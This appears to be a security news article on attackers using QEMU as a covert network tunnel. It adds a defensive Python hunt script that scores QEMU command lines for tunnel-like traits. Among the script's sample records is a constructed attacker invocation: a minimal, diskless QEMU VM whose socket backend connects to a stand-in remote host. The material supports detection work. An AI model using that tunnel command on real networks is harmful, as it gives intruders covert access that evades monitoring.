Attackers have been observed abusing QEMU, the open-source machine emulator and virtualizer, to build covert network tunnels during an intrusion at a large company. QEMU is normally used to run guest operating systems on a host; here the threat actors used its virtual networking backends to create network interfaces inside a throwaway virtual machine and connect them to a remote server, giving them a tunnel into the victim network with almost no effect on system performance. Kaspersky analysts uncovered the technique while investigating suspicious activity on the breached company's systems. Note that no vulnerability in QEMU was involved: the attackers ran a legitimate, unmodified program with unusual arguments.
Network tunnels give attackers a persistent channel between their infrastructure and compromised systems, and the traffic is usually encrypted so that it cannot be inspected by security controls in the path. Utilities such as FRP and ngrok are the common choice for this; QEMU is an unconventional one, but it brings capabilities the usual tunnelling tools lack, including full hardware emulation and several virtual network backends that can be joined together. In this attack that versatility let the malicious traffic blend in with ordinary virtualization activity and let the attackers bridge otherwise segmented parts of the network by placing VM pivot points on hosts that could reach both sides. Because QEMU is a widely deployed, legitimate binary, its mere presence on an endpoint is not an indicator; what is anomalous is how it is invoked.
The attackers kept a light footprint by giving the virtual machine only minimal resources, so that CPU and memory consumption would not draw attention. A VM configured that way cannot run a real guest operating system; its only purpose is to forward packets between its network backends, which is itself a property a defender can look for. Alongside QEMU, the attackers used Angry IP Scanner for network reconnaissance and mimikatz for credential theft.
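The invocation pattern described above (a tiny, diskless, headless VM whose network backends connect the host's LAN to a remote peer) is something endpoint telemetry can surface. The following hunt is an added example written for this page, not Kaspersky's detection logic or anything from the QEMU project: it parses process-creation records, extracts the memory size, boot media and network backends from the QEMU command line, and scores how much the invocation looks like a tunnel rather than a virtual machine. The event records, the command lines (including the 203.0.113.10 documentation address standing in for an attacker server), the scoring weights and the threshold are all constructed assumptions to be tuned against your own fleet's baseline.

```python
"""Hunt process-creation events for QEMU invocations shaped like a network
tunnel rather than a real virtual machine.

Added illustration, not Kaspersky's detection logic. The event records, QEMU
command lines, scoring weights and threshold below are constructed samples
and assumptions; calibrate them against your own telemetry.
"""
import ipaddress
import shlex

QEMU_IMAGE_NAMES = {
    "qemu-system-i386.exe", "qemu-system-x86_64.exe",
    "qemu-system-i386", "qemu-system-x86_64", "qemu-system-aarch64",
}
# Options that give the guest something to boot; a VM with none of these has
# no operating system to run and exists only for its network backends.
BOOT_MEDIA_OPTS = {"-hda", "-hdb", "-hdc", "-hdd", "-drive", "-cdrom",
                   "-kernel", "-blockdev", "-pflash", "-fda", "-fdb"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]


def parse_mem_mb(value):
    """Turn a -m argument ('1M', '2048', '4G', 'size=512M') into megabytes."""
    value = value.split(",")[0]
    if value.startswith("size="):
        value = value[5:]
    scale = {"K": 1 / 1024, "M": 1, "G": 1024, "T": 1024 * 1024}
    unit = value[-1].upper()
    if unit in scale:
        return float(value[:-1]) * scale[unit]
    return float(value)  # QEMU treats a bare number as megabytes


def parse_qemu_args(cmdline):
    """Extract the properties the scoring needs from a QEMU command line."""
    argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    info = {"mem_mb": None, "netdevs": [], "boot_media": False,
            "nographic": "-nographic" in argv}
    for i, arg in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if arg == "-m":
            info["mem_mb"] = parse_mem_mb(nxt)
        elif arg in ("-netdev", "-net", "-nic"):
            backend, _, rest = nxt.partition(",")
            opts = dict(kv.split("=", 1) for kv in rest.split(",") if "=" in kv)
            info["netdevs"].append({"type": backend, **opts})
        elif arg in BOOT_MEDIA_OPTS:
            info["boot_media"] = True
    return info


def is_external(endpoint):
    """True when a connect=/listen= endpoint points outside the local ranges."""
    host = endpoint.rsplit(":", 1)[0]
    if not host:
        return False  # listen=:PORT binds all interfaces, scored separately
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() != "localhost"  # a hostname: assume external
    return not any(ip in net for net in INTERNAL_NETS)


def score_qemu_event(event):
    """Return (score, reasons) for one process-creation event; (0, []) if not QEMU."""
    image = event["Image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image not in QEMU_IMAGE_NAMES:  # weak check: a renamed binary evades it
        return 0, []
    info = parse_qemu_args(event["CommandLine"])
    score, reasons = 0, []
    types = {nd["type"] for nd in info["netdevs"]}
    for nd in info["netdevs"]:
        if nd["type"] != "socket":
            continue
        score += 3
        reasons.append("socket netdev carries raw Ethernet frames to another host")
        if "connect" in nd and is_external(nd["connect"]):
            score += 2
            reasons.append(f"socket backend connects out to {nd['connect']}")
        elif "listen" in nd:
            score += 1
            reasons.append(f"socket backend listens on {nd['listen']}")
    if "socket" in types and "user" in types:
        score += 1
        reasons.append("user backend (host LAN via SLIRP) joined to socket backend")
    if info["mem_mb"] is not None and info["mem_mb"] < 32:
        score += 2
        reasons.append(f"{info['mem_mb']:g} MB RAM cannot boot a real guest")
    if not info["boot_media"]:
        score += 2
        reasons.append("no disk, ISO or kernel: nothing for the guest to run")
    if info["nographic"]:
        score += 1
        reasons.append("-nographic: headless, no console a user would watch")
    return score, reasons


def hunt(events, threshold=5):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_qemu_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",        # developer VM
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "qemu-system-x86_64.exe -m 2048 -drive file=win10.qcow2,if=virtio "
                    "-netdev user,id=n0,hostfwd=tcp::2222-:22 -device virtio-net,netdev=n0"},
    {"Image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",        # lab VM, socket net
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "qemu-system-x86_64.exe -m 1024 -drive file=lab.qcow2 "
                    "-netdev socket,id=s0,listen=:1234 -device e1000,netdev=s0"},
    # Tunnel shape: 1 MB, diskless, headless, joining the host LAN to a remote
    # peer. 203.0.113.10 is a documentation address standing in for attacker infra.
    {"Image": r"C:\Users\Public\qemu\qemu-system-i386.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off "
                    "-netdev socket,id=sock,connect=203.0.113.10:443 -nographic"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for ev, score, reasons in hunt(SAMPLE_EVENTS):
        print(f"[{score}] {ev['Image']} <- {ev['ParentImage']}")
        for reason in reasons:
            print("    -", reason)
```

Only the third record crosses the threshold; the lab VM with a listening socket backend scores below it because it has a disk and a normal memory size, which is the distinction the hunt is built around. Matching on the image name is deliberately the weakest part: an attacker can rename the binary, so in production pair this with file-hash or PE-metadata matching for QEMU and with network telemetry showing the process itself opening outbound TCP connections to addresses outside the organisation.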
Kaspersky stresses that layered defences are needed to catch abuse of legitimate tools like QEMU, and names round-the-clock network monitoring and endpoint protection as the essential measures. Neither layer is sufficient alone: the endpoint sees the anomalous process and command line, while the network sees the resulting connection to infrastructure the organisation does not own, and correlating the two by a Security Operations Center (SOC) is what turns a single odd process into a detected intrusion. The case is a reminder that targeted attacks increasingly rely on software already present or easily installed on the victim, so detection has to focus on behaviour rather than on the presence of known-bad files.